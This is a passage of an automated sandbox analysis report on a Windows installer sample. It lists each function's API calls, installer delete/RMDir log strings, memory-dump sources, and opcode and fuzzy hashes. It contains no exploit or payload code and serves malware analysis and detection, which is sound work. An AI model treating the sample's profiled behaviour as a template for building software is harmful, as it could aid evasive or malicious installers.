                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                              • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                              • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                              Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                              • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                              • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                              Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                                                                              • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                              • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                              Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                              • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                              • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                              Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                              • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                              • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                                              Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                              • String ID: $ @$M$N
                                                                                                                                                                                                                                                                              • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                              • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                                                                                                                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                              Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                              • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                              • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                              • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                              • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                              Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                              • String ID: F$A
                                                                                                                                                                                                                                                                              • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                              • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                                                                                                                                                                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
